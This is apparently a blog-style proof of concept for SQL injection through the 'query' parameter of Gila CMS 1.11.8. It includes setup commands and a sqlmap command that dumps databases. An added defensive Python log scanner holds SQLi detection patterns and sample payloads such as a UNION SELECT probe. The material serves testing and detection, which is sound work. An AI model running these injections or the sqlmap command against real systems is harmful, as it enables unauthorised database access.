
Exploit Gila CMS 1.11.8 – ‘query’ SQL Injection (PoC)

dejimason



Hey folks, today we will show you a proof of concept (PoC) of the “Gila CMS 1.11.8 – ‘query’ SQL Injection” vulnerability. The GET parameter “query” is vulnerable, so we will use the SQL injection tool 💉 to retrieve the database.

About the Vulnerability
  • Exploit Author: Carlos Ramírez L. (BillyV4)
  • Vendor Homepage: https://gilacms.com/
  • Version: Gila 1.11.8
  • CVE: CVE-2020-5515

Vulnerability Setup
# Download and unpack the vulnerable release (lab use only)
wget -O gila-1.11.8.zip https://github.com/GilaCMS/gila/archive/1.11.8.zip
unzip gila-1.11.8.zip
# Create the web root directory and copy the application into it
mkdir -p /var/www/html/gila
cp -R gila-1.11.8/* /var/www/html/gila/
cp gila-1.11.8/.htaccess /var/www/html/gila/
# Give the web server user ownership of the deployed files
chown -R www-data:www-data /var/www/html/gila/


Full Proof of Concept

Step 1

[Screenshot: burp.png]


Step 2

Usage: sqlmap -r <burpsuite capture file> --dbs --level=5 --risk=3

[Screenshot: sqlcommand.png]


Step 3

[Screenshot: result.png]
About the Author: Shubham Goyal, Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be contacted on LinkedIn.
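
From the defender's side, the traffic this PoC generates is visible in the web server's access log. The following added example (not part of the original post) flags requests whose `query` parameter carries SQL syntax or arrives with the default sqlmap User-Agent; the log lines, IP addresses, timestamps and the `/gila/` request path are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - - [time] "METHOD url PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Heuristic markers of SQL syntax in a value that should be a plain search term.
SQLI_RE = re.compile(
    r"""['"]\s*(?:or|and)\b                      # quote followed by a boolean operator
      | \bunion\b.+\bselect\b                    # UNION ... SELECT
      | \b(?:sleep|benchmark|extractvalue|updatexml)\s*\(   # timing/error functions
      | --\s | /\*                               # SQL comment openers
    """, re.I | re.S | re.X)

def suspicious(line, param="query"):
    """Return (client_ip, reason) if the log line looks like an injection probe."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, url, agent = m.groups()
    # parse_qs URL-decodes the values, so %27 is seen as a single quote here.
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [])
    if any(SQLI_RE.search(v) for v in values):
        return ip, "sql-syntax"
    # The agent string is trivially changed, so treat it as a weak signal only.
    if values and agent.lower().startswith("sqlmap/"):
        return ip, "scanner-agent"
    return None

def hits_per_client(lines, param="query"):
    """Count suspicious requests per client IP for alerting or blocking."""
    hits = Counter()
    for line in lines:
        result = suspicious(line, param)
        if result:
            hits[result[0]] += 1
    return hits

# Constructed sample log lines (documentation IP ranges, made-up path and times).
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Jan/2020:10:00:01 +0000] "GET /gila/?query=blue+shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2020:10:00:05 +0000] "GET /gila/?query=a%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2020:10:00:06 +0000] "GET /gila/?query=x%27%20UNION%20SELECT%20NULL--%20- HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2020:10:00:07 +0000] "GET /gila/?query=test HTTP/1.1" 200 5120 "-" "sqlmap/1.4#stable (http://sqlmap.org)"',
    '198.51.100.23 - - [10/Jan/2020:10:00:09 +0000] "GET /gila/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, count in hits_per_client(SAMPLE_LOG).items():
        print(f"{ip}: {count} suspicious request(s) against 'query'")
```

A scan at `--level=5 --risk=3` sends a large number of such requests in a short window, so a per-client count over a few minutes is a practical alert threshold.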